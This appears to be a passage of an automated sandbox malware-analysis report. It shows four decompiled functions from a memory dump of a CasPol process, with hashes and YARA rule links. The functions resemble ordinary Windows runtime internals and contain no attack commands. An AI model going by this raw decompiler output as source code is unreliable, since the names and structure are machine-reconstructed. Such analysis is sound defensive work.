                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58f2ba18561799aa3c5038bf714e7e3f7cc65476b5ceb627acabf88fd0abf1f6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA41C371A403189FEB62DF18DC84F6AF7A9EB55610F000099ED4697285E7B0EE84CB91
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01738A0A Relevance: .1, Instructions: 120COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                                                                			E01738A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x181d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return L0176B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E0173E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x1701180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = L01751DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							L01763C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E01738999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                                                                                                                                                                                                                                                                                0x01738a0a
                                                                                                                                                                                                                                                                                                0x01738a1c
                                                                                                                                                                                                                                                                                                0x01738a23
                                                                                                                                                                                                                                                                                                0x01738a2e
                                                                                                                                                                                                                                                                                                0x01738a30
                                                                                                                                                                                                                                                                                                0x01738a36
                                                                                                                                                                                                                                                                                                0x01738a3c
                                                                                                                                                                                                                                                                                                0x01738a3e
                                                                                                                                                                                                                                                                                                0x01738a4a
                                                                                                                                                                                                                                                                                                0x01738a52
                                                                                                                                                                                                                                                                                                0x01738a9c
                                                                                                                                                                                                                                                                                                0x01738aae
                                                                                                                                                                                                                                                                                                0x01738a58
                                                                                                                                                                                                                                                                                                0x01738a5e
                                                                                                                                                                                                                                                                                                0x01738a6a
                                                                                                                                                                                                                                                                                                0x01738a6f
                                                                                                                                                                                                                                                                                                0x01738a75
                                                                                                                                                                                                                                                                                                0x01738a7d
                                                                                                                                                                                                                                                                                                0x01738a85
                                                                                                                                                                                                                                                                                                0x01738a86
                                                                                                                                                                                                                                                                                                0x01738a89
                                                                                                                                                                                                                                                                                                0x01738a93
                                                                                                                                                                                                                                                                                                0x01738a99
                                                                                                                                                                                                                                                                                                0x01738a9b
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01738aaf
                                                                                                                                                                                                                                                                                                0x01738abe
                                                                                                                                                                                                                                                                                                0x01738ac3
                                                                                                                                                                                                                                                                                                0x01738acb
                                                                                                                                                                                                                                                                                                0x01738ad7
                                                                                                                                                                                                                                                                                                0x01738ae0
                                                                                                                                                                                                                                                                                                0x01738af1
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01738af1
                                                                                                                                                                                                                                                                                                0x01738acd
                                                                                                                                                                                                                                                                                                0x01738ad5
                                                                                                                                                                                                                                                                                                0x01738afb
                                                                                                                                                                                                                                                                                                0x01738afd
                                                                                                                                                                                                                                                                                                0x01738aff
                                                                                                                                                                                                                                                                                                0x01738b07
                                                                                                                                                                                                                                                                                                0x01738b22
                                                                                                                                                                                                                                                                                                0x01738b24
                                                                                                                                                                                                                                                                                                0x01738b2a
                                                                                                                                                                                                                                                                                                0x01738b2e
                                                                                                                                                                                                                                                                                                0x01738b3f
                                                                                                                                                                                                                                                                                                0x01738b78
                                                                                                                                                                                                                                                                                                0x01738b41
                                                                                                                                                                                                                                                                                                0x01738b52
                                                                                                                                                                                                                                                                                                0x01738b54
                                                                                                                                                                                                                                                                                                0x01738b5c
                                                                                                                                                                                                                                                                                                0x01738b74
                                                                                                                                                                                                                                                                                                0x01738b74
                                                                                                                                                                                                                                                                                                0x01738b5c
                                                                                                                                                                                                                                                                                                0x01738b3f
                                                                                                                                                                                                                                                                                                0x01738b5e
                                                                                                                                                                                                                                                                                                0x01738b61
                                                                                                                                                                                                                                                                                                0x01738b64
                                                                                                                                                                                                                                                                                                0x01738b64
                                                                                                                                                                                                                                                                                                0x01738b6c
                                                                                                                                                                                                                                                                                                0x01738b6c
                                                                                                                                                                                                                                                                                                0x01738b11
                                                                                                                                                                                                                                                                                                0x01789cd5
                                                                                                                                                                                                                                                                                                0x01789cd5
                                                                                                                                                                                                                                                                                                0x01738b17
                                                                                                                                                                                                                                                                                                0x01738b1a
                                                                                                                                                                                                                                                                                                0x01738b1a
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01738ad5
                                                                                                                                                                                                                                                                                                0x01738a89

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 36f265f9721d2a412ab52eae2b070e9252496099a053c01e443b628e53579c92
                                                                                                                                                                                                                                                                                                • Instruction ID: a4b9de2b0646c327f5b5ed8da00d8ab3118f2a769a52a791577adb68e8e9c57e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36f265f9721d2a412ab52eae2b070e9252496099a053c01e443b628e53579c92
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A14152B1A4022D9BDB24DF59CC88AA9F7F8EB94300F1046E9E91997243E7709E85CF51
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 017A69A6 Relevance: .1, Instructions: 108COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 69%
                                                                                                                                                                                                                                                                                                			E017A69A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x181d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L01736C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E017A6BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E01769980() >= 0) {
							E01742280(_t56, 0x1818778);
							_t77 = 1;
							_t68 = 1;
							if( *0x1818774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x1818774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(L0172B6F0(0x170c338, 0x170c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E01769520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E017695D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					L0173FFB0(_t68, _t77, 0x1818778);
				}
				_pop(_t78);
				return L0176B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                                                                                                                                                                                                                                                                                0x017a69b5
                                                                                                                                                                                                                                                                                                0x017a69be
                                                                                                                                                                                                                                                                                                0x017a69c3
                                                                                                                                                                                                                                                                                                0x017a69c9
                                                                                                                                                                                                                                                                                                0x017a69cc
                                                                                                                                                                                                                                                                                                0x017a69d1
                                                                                                                                                                                                                                                                                                0x017a69d3
                                                                                                                                                                                                                                                                                                0x017a69de
                                                                                                                                                                                                                                                                                                0x017a69e1
                                                                                                                                                                                                                                                                                                0x017a69ea
                                                                                                                                                                                                                                                                                                0x017a69f6
                                                                                                                                                                                                                                                                                                0x017a69fe
                                                                                                                                                                                                                                                                                                0x017a6a13
                                                                                                                                                                                                                                                                                                0x017a6a14
                                                                                                                                                                                                                                                                                                0x017a6a15
                                                                                                                                                                                                                                                                                                0x017a6a16
                                                                                                                                                                                                                                                                                                0x017a6a1e
                                                                                                                                                                                                                                                                                                0x017a6a26
                                                                                                                                                                                                                                                                                                0x017a6a31
                                                                                                                                                                                                                                                                                                0x017a6a36
                                                                                                                                                                                                                                                                                                0x017a6a37
                                                                                                                                                                                                                                                                                                0x017a6a40
                                                                                                                                                                                                                                                                                                0x017a6a49
                                                                                                                                                                                                                                                                                                0x017a6a4a
                                                                                                                                                                                                                                                                                                0x017a6a53
                                                                                                                                                                                                                                                                                                0x017a6a59
                                                                                                                                                                                                                                                                                                0x017a6a5d
                                                                                                                                                                                                                                                                                                0x017a6a5e
                                                                                                                                                                                                                                                                                                0x017a6a64
                                                                                                                                                                                                                                                                                                0x017a6a67
                                                                                                                                                                                                                                                                                                0x017a6a6a
                                                                                                                                                                                                                                                                                                0x017a6a6d
                                                                                                                                                                                                                                                                                                0x017a6a70
                                                                                                                                                                                                                                                                                                0x017a6a77
                                                                                                                                                                                                                                                                                                0x017a6a7d
                                                                                                                                                                                                                                                                                                0x017a6a86
                                                                                                                                                                                                                                                                                                0x017a6a89
                                                                                                                                                                                                                                                                                                0x017a6a9c
                                                                                                                                                                                                                                                                                                0x017a6a9f
                                                                                                                                                                                                                                                                                                0x017a6aa2
                                                                                                                                                                                                                                                                                                0x017a6aa5
                                                                                                                                                                                                                                                                                                0x017a6aaf
                                                                                                                                                                                                                                                                                                0x017a6ab1
                                                                                                                                                                                                                                                                                                0x017a6ab8
                                                                                                                                                                                                                                                                                                0x017a6ab9
                                                                                                                                                                                                                                                                                                0x017a6abb
                                                                                                                                                                                                                                                                                                0x017a6abe
                                                                                                                                                                                                                                                                                                0x017a6ac5
                                                                                                                                                                                                                                                                                                0x017a6ac5
                                                                                                                                                                                                                                                                                                0x017a6aaf
                                                                                                                                                                                                                                                                                                0x017a6a40
                                                                                                                                                                                                                                                                                                0x017a6a26
                                                                                                                                                                                                                                                                                                0x017a69fe
                                                                                                                                                                                                                                                                                                0x017a6ace
                                                                                                                                                                                                                                                                                                0x017a6ad0
                                                                                                                                                                                                                                                                                                0x017a6ad3
                                                                                                                                                                                                                                                                                                0x017a6ad8
                                                                                                                                                                                                                                                                                                0x017a6adf
                                                                                                                                                                                                                                                                                                0x017a6adf
                                                                                                                                                                                                                                                                                                0x017a6ae8
                                                                                                                                                                                                                                                                                                0x017a6aef
                                                                                                                                                                                                                                                                                                0x017a6aef
                                                                                                                                                                                                                                                                                                0x017a6af9
                                                                                                                                                                                                                                                                                                0x017a6b06

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: dcec08d4b8d6ccb4ded718dccf24884d0c1eeccf93a17a7c4fc88aa3ad9f1528
                                                                                                                                                                                                                                                                                                • Instruction ID: e6f09fa70b699b9fbd3ef285656eda833e0f4c7a294285a45c6be8398acdd7bb
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dcec08d4b8d6ccb4ded718dccf24884d0c1eeccf93a17a7c4fc88aa3ad9f1528
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF417EB1D012099FDB11CFA9D944BEEFBF8EF88714F18862AE914A3244DB709A05CB50
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01763D43 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                			E01763D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E01737B60(0, _t61, 0x17011c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E01737B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L01744620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                                                                                                                                                                                                                                                                                0x01763d4c
                                                                                                                                                                                                                                                                                                0x01763d50
                                                                                                                                                                                                                                                                                                0x01763d55
                                                                                                                                                                                                                                                                                                0x01763d5e
                                                                                                                                                                                                                                                                                                0x0179e79a
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0179e79a
                                                                                                                                                                                                                                                                                                0x01763d68
                                                                                                                                                                                                                                                                                                0x0179e789
                                                                                                                                                                                                                                                                                                0x01763d9d
                                                                                                                                                                                                                                                                                                0x01763da3
                                                                                                                                                                                                                                                                                                0x01763daf
                                                                                                                                                                                                                                                                                                0x01763db5
                                                                                                                                                                                                                                                                                                0x01763dbc
                                                                                                                                                                                                                                                                                                0x01763dc4
                                                                                                                                                                                                                                                                                                0x01763dc9
                                                                                                                                                                                                                                                                                                0x01763dce
                                                                                                                                                                                                                                                                                                0x0179e7ae
                                                                                                                                                                                                                                                                                                0x0179e7ae
                                                                                                                                                                                                                                                                                                0x01763dde
                                                                                                                                                                                                                                                                                                0x01763de2
                                                                                                                                                                                                                                                                                                0x01763de7
                                                                                                                                                                                                                                                                                                0x01763e0d
                                                                                                                                                                                                                                                                                                0x01763e13
                                                                                                                                                                                                                                                                                                0x01763e16
                                                                                                                                                                                                                                                                                                0x01763e1e
                                                                                                                                                                                                                                                                                                0x01763e25
                                                                                                                                                                                                                                                                                                0x01763e28
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01763e2a
                                                                                                                                                                                                                                                                                                0x01763e2f
                                                                                                                                                                                                                                                                                                0x01763e37
                                                                                                                                                                                                                                                                                                0x01763e37
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01763e37
                                                                                                                                                                                                                                                                                                0x01763e31
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01763e31
                                                                                                                                                                                                                                                                                                0x01763e20
                                                                                                                                                                                                                                                                                                0x01763e20
                                                                                                                                                                                                                                                                                                0x01763e35
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01763de9
                                                                                                                                                                                                                                                                                                0x01763de9
                                                                                                                                                                                                                                                                                                0x01763de9
                                                                                                                                                                                                                                                                                                0x01763dee
                                                                                                                                                                                                                                                                                                0x01763dfd
                                                                                                                                                                                                                                                                                                0x01763dff
                                                                                                                                                                                                                                                                                                0x01763e02
                                                                                                                                                                                                                                                                                                0x01763e05
                                                                                                                                                                                                                                                                                                0x01763e05
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01763df0
                                                                                                                                                                                                                                                                                                0x01763de7
                                                                                                                                                                                                                                                                                                0x0179e78f
                                                                                                                                                                                                                                                                                                0x0179e794
                                                                                                                                                                                                                                                                                                0x01763d79
                                                                                                                                                                                                                                                                                                0x01763d84
                                                                                                                                                                                                                                                                                                0x01763d89
                                                                                                                                                                                                                                                                                                0x01763d8e
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0179e7a4
                                                                                                                                                                                                                                                                                                0x01763d96
                                                                                                                                                                                                                                                                                                0x01763d9a
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01763d9a
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0179e794
                                                                                                                                                                                                                                                                                                0x01763d6e
                                                                                                                                                                                                                                                                                                0x01763d73
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0179e7b5
                                                                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 4e0447cf5da1b02b208a19dab5988b1fe9b8ab0dafeddb6d5cc6bc7b2c2679c9
                                                                                                                                                                                                                                                                                                • Instruction ID: b5d03e058496b382b4e24b145693170afac28a5d0a07b7574fb5033b4da6ef60
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e0447cf5da1b02b208a19dab5988b1fe9b8ab0dafeddb6d5cc6bc7b2c2679c9
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B731B031600615DBDB29CF2DD841A6AFBF9FF5970070980AEE949CB351EB30D880C7A1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0174C182 Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 68%
                                                                                                                                                                                                                                                                                                			E0174C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E01747D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E017F8D34(_v8, _t80);
					}
					E01742280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						L0173FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E017F8833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						L0173FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0176B180();
						if(_a4 != 0) {
							E01742280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E0174BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E0174BB2D(_t16, _t15);
						E0174B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						L0173FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							L0173FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					L0173FFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                                                                                                                                                                                                                                                                                0x0174c18d
                                                                                                                                                                                                                                                                                                0x0174c18f
                                                                                                                                                                                                                                                                                                0x0174c191
                                                                                                                                                                                                                                                                                                0x0174c19b
                                                                                                                                                                                                                                                                                                0x0174c1a0
                                                                                                                                                                                                                                                                                                0x0174c1d4
                                                                                                                                                                                                                                                                                                0x0174c1de
                                                                                                                                                                                                                                                                                                0x01792d6e
                                                                                                                                                                                                                                                                                                0x0174c1e4
                                                                                                                                                                                                                                                                                                0x0174c1e4
                                                                                                                                                                                                                                                                                                0x0174c1e4
                                                                                                                                                                                                                                                                                                0x0174c1ec
                                                                                                                                                                                                                                                                                                0x01792d7d
                                                                                                                                                                                                                                                                                                0x01792d7d
                                                                                                                                                                                                                                                                                                0x0174c1f3
                                                                                                                                                                                                                                                                                                0x0174c1ff
                                                                                                                                                                                                                                                                                                0x01792d88
                                                                                                                                                                                                                                                                                                0x01792d8d
                                                                                                                                                                                                                                                                                                0x01792d94
                                                                                                                                                                                                                                                                                                0x01792d94
                                                                                                                                                                                                                                                                                                0x01792d9f
                                                                                                                                                                                                                                                                                                0x01792da4
                                                                                                                                                                                                                                                                                                0x01792dab
                                                                                                                                                                                                                                                                                                0x01792db0
                                                                                                                                                                                                                                                                                                0x01792db2
                                                                                                                                                                                                                                                                                                0x01792db3
                                                                                                                                                                                                                                                                                                0x01792db4
                                                                                                                                                                                                                                                                                                0x01792dbc
                                                                                                                                                                                                                                                                                                0x01792dc3
                                                                                                                                                                                                                                                                                                0x01792dc3
                                                                                                                                                                                                                                                                                                0x0174c205
                                                                                                                                                                                                                                                                                                0x0174c205
                                                                                                                                                                                                                                                                                                0x0174c208
                                                                                                                                                                                                                                                                                                0x0174c20e
                                                                                                                                                                                                                                                                                                0x0174c211
                                                                                                                                                                                                                                                                                                0x0174c216
                                                                                                                                                                                                                                                                                                0x0174c219
                                                                                                                                                                                                                                                                                                0x0174c21f
                                                                                                                                                                                                                                                                                                0x0174c222
                                                                                                                                                                                                                                                                                                0x0174c22c
                                                                                                                                                                                                                                                                                                0x0174c234
                                                                                                                                                                                                                                                                                                0x0174c23a
                                                                                                                                                                                                                                                                                                0x0174c23f
                                                                                                                                                                                                                                                                                                0x0174c245
                                                                                                                                                                                                                                                                                                0x0174c24b
                                                                                                                                                                                                                                                                                                0x0174c251
                                                                                                                                                                                                                                                                                                0x0174c25a
                                                                                                                                                                                                                                                                                                0x0174c276
                                                                                                                                                                                                                                                                                                0x0174c27d
                                                                                                                                                                                                                                                                                                0x0174c27d
                                                                                                                                                                                                                                                                                                0x0174c25c
                                                                                                                                                                                                                                                                                                0x0174c25c
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0174c25e
                                                                                                                                                                                                                                                                                                0x0174c1a4
                                                                                                                                                                                                                                                                                                0x0174c1aa
                                                                                                                                                                                                                                                                                                0x0174c1b3
                                                                                                                                                                                                                                                                                                0x0174c265
                                                                                                                                                                                                                                                                                                0x0174c26c
                                                                                                                                                                                                                                                                                                0x0174c26c
                                                                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                                                                                                                                                                                                                                • Instruction ID: e49abaaca84583822fe6626d0aa85487633ab8de70bd74d8885591f4b141c711
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD3178B2B06587BFDB06EBB4C484BE9FB54BF52200F04415AD51C87306DB34AA49DBE1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

